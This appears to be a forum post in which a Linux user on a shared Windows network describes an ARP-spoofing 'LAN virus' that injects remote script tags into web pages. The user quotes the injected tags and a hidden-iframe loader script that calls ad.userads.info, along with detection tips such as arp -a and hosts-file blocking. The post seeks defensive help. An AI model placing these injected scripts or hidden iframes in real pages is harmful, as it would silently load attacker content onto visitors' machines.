Very Strange Lan Virus
DO NOT OPEN THE LINKS IN THIS PAGE
Hello guys,
I'm Ubuntu and I'm facing very strange lan virus. There about 25 computers in my network used shared connection and all of them using Windows and I'm the only one that use Linux so I was far away from all the viruses BUT these days are gone
There's a virus ( Lan Virus ) on our network where evey page I open insert this code on the top of it
<script language="javascript" SRC="http://v.freefl.info/day.js"></script>
this virus makes the internet more slower with many disconnections some pages hang and don't open and some times Firefox freeze and some files when I tried to download them because of this virus some other EXE files were trying to download instead of this files.
to know more about this virus read this >>
without thinking I installed AdBlock Ext in Firefox and blocked this script then Imade a little change in the hosts and made this link v.freefl.info opens 127.0.0.3 to make sure that this virus will never installThis is LAN virus which infects some computers in the LAN cloning server's MAC adress and turning them into the proxy servers, and making, frankly speaking, TWO servers in the network. Thus, if there's a virus proxy server - it pastes the code mentioned above in each page and sends these pages to the computers in the LAN.
That code slows down the speed very much cause it calls other pages to be loaded.
Antivirus will not help much 'cause it either will hang on the browser or with each page says the virus is detected. There's problem not in client (your) computer.
If you're in the LAN you can check out the arp table in comand promt -> cmd -> arp -a
The arp table will show two identical MAC's whitch is abnormal in normal work.
If you disconnect infected the computer from network, other one infected will take the role of false proxy server.
not only that but I disabled DHCP from the control panel of the router
and I thought there's no way that this virus will appear again
BUT today when I was opening google.com I found some strange URLs in the status bar >> View Source >> and found this
<script language="javascript" SRC="http://ad.userads.info/ads.js"></script>
and if you broser this script you will find this
document.writeln("<script>");
document.writeln("function oK_Begin(){");
document.writeln("var Then = new Date() ");
document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)");
document.writeln("var cookieString = new String(document.cookie)");
document.writeln("var cookieHeader = \"Cookie1=\" ");
document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)");
document.writeln("if (beginPosition != -1){ ");
document.writeln("} else ");
document.writeln("{ document.cookie = \"Cookie1=POPWINDOS;expires=\"+ Then.toGMTString() ");
document.writeln("document.write(\'<iframe width=0 height=0 src=\"http://ad.userads.info/in.htm\"><\/iframe>\');");
document.writeln("}");
document.writeln("}");
document.writeln("oK_Begin();");
document.writeln("<\/script>");
document.writeln("<script>window.onerror=function( ){return true;}<\/script>")
which contains this Iframe
<iframe width=0 height=0 src=\"http://ad.userads.info/in.htm\"><\/iframe>
and If you open this page http://ad.userads.info/in.htm you will find a million script like the first one
NOW HOW CAN I PREVENT THESE VIRUSES FROM ACCESSING MY PC THROWTH NETWORK ??
Is there's a port that I can close or something
Thanks in advance
Adv Reply
Originally Posted by amaiko
Bookmarks